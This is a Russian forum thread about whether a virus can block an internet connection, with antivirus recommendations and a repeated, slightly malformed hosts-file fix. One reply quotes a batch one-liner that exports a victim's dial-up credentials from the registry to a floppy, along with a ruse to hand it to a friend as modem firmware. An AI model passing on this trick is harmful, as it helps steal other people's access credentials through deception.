Интернет
Может ли вирус блокировать подключение к нету?
Антивирус ничего не обнаруживает, кроме большого количества файлов с ошибкой открытия. С настроиками все в порядке и раньше таких проблем не было. Может утилиту по поиску вирусов какую нить посоветуете?)
Посоветую http://biblprog.org.ua/ru/a_squared_free/
a-squared Free обеспечивает безопасность ПК, определяя и обезвреживая следующее вредоносное программное обеспечение: программы-шпионы (несанкционированный доступ к конфиденциальной информации) , рекламное ПО (перенаправляет ваш браузер на страницы сайтов с оплачиваемой рекламой) , интернет-черви (используют ваш канал интернета для создания спам-рассылки) , клавиатурные шпионы (идентифицируют нажатые клавиши с целью кражи паролей) , руткиты (набор программ для скрытия следов присутствия злоумышленника или вредоносной программы в системе) , звонильщики (изменяют номер набора в модеме на более дорогой) и другие угрозы.
Идём по адресу: C:\WINDOWS\system32\drivers\etc открываем блокнотом файл hosts.
Удаляем: всё после - 127.00.1 localhost
Закрываем
Удаляем: всё после - 127.00.1 localhost
Закрываем
конечно возможно но и реально может быть из за вируса вот для этого поставь нод просканируй весь комп и все будет нормально ))дерзай желаю удачи
вирус может. и не вирус тоже может. я тут как-то вычтал:
"За инет нужно платить не нам.. .
Один раз я подумал, а можно ли сделать что-то типа трояна 3-4 строчками в батнике. Оказалось, можно и очень просто:
@%windir%\regedit /e a:\dial-up.reg HKEY_CURRENT_USER\RemoteAccess > nul
Сохраняй этот файл и записывай на дискeтку. При удобном случае суй приятелю со словами: "Вот я новую прошивку для модема достал у меня, что-то не пашет. Попробуй. Только с дискеты запускай, так в инструкции написанно... ""
взял я это из http://www.xakep.ru/post/10641/default.asp
"За инет нужно платить не нам.. .